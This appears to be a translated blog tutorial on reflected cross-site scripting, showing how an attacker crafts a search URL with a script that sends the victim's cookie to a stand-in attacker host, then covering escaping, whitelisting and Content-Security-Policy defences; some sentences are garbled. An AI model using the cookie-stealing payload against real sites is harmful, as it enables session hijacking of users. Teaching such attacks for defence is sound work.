overview
Hello, when building a website, you need to make sure that you do not allow Javascript
be returned. Last time I wrote about Unlike Stored-XSS
, Reflected-XSS
exploit code will not be stored on the server. Stored-XSS
allows an attacker to store JS
malicious code on the server’s database, which means that other users are also affected when visiting the page containing the malicious code.
In this article, we will explore another way in which an attacker can use XSS
to transmit JS
malicious code, which is called Reflected XSS
.
If your website receives an HTTP request from the user and shows it to them again, you have activated another vector from a third party that can inject malicious JavaScript. Let’s see how it works.
How it works
The familiar character in his posts is Mal , this guy finds a search function on your website that has a problem and he will crack it.
He knew that the search keyword on the URL would be displayed on the search results page, and he also wondered if it had escaped
?
To check, he corrected the url with the JS
snippet
on search param: www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
.
When he drops the link in the browser, the haxxed.com?cookie=asFFEfn222fefeknladf
JS
will execute and redirect to haxxed.com?cookie=asFFEfn222fefeknladf
(malicious site) … yep, poor u )
Now he proceeds to deceive someone, such as poor Vic – unfortunate character in this series )
Mal sends Vic an email with a tempting link, and points to the edited link
Vic click on the link, the page renders the search parameter in html without being properly escape
, it will generate a new <script>
tag
1 2 3 4 5 6 7 8 | <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> div</span> <span class="token attr-name">class</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> search-terms <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> Search results for " <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> script</span> <span class="token punctuation">></span></span> <span class="token script language-javascript"> window <span class="token punctuation">.</span> location <span class="token operator">=</span> <span class="token string">"http://www.haxxed.com?cookie="</span> <span class="token operator">+</span> document <span class="token punctuation">.</span> cookie </span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> script</span> <span class="token punctuation">></span></span> " <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> div</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> h6</span> <span class="token punctuation">></span></span> No results found <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> h6</span> <span class="token punctuation">></span></span> |
The script
is executed when the web page is loaded, and there is no taco ) you are directed to a standalone website with cookies. Mal will check Vic ‘s server log and hijack
session
1 2 3 4 5 | http://www.haxxed.com?cookie=asdfefefffasdfCsdfnE http://www.haxxed.com?cookie=engkelfiAnlJreklfNkl http://www.haxxed.com?cookie=SneklfjsdkleekflaAne http://www.haxxed.com?cookie=asFFEfn222fefeknladf |
Risky
This is a common error, easy to exploit, and dangerous, it is not as dangerous as stored XSS attacks
but much more common.
This vulnerability is easy to overlook in the code review, because often we will mainly check the stored data. Be especially careful when checking the following page types:
- Search Results
- Error pages
- form submissions
For example, we saw an error with the GET
method, but the POST
request should be carefully checked. Even if you use CSRF, the attacker can still bypass this attack.
Protect
Make sure that the dynamic content returned cannot inject
Javascript
.
- Escape dynamic content
- Whitelist Values
- Implement a Content-Security Policy
With Implement a Content-Security Policy you can use the <meta>
tag in <head>
with the following content:
1 2 | <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">http-equiv</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> Content-Security-Policy <span class="token punctuation">"</span></span> <span class="token attr-name">content</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> script-src <span class="token punctuation">'</span> self <span class="token punctuation">'</span> https://apis.google.com <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> |
summary
The above is a basic introduction to Reflected-XSS
, hoping to help you avoid this security error. Thanks for reading all, happy coding!